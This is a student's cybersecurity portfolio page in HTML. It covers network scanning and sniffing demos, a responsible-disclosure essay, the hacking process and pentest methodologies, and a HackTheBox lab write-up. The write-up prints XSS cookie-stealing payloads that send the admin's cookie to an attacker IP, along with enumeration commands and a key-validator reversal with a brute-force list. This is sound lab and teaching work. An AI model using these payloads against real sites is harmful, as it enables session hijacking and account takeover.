          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
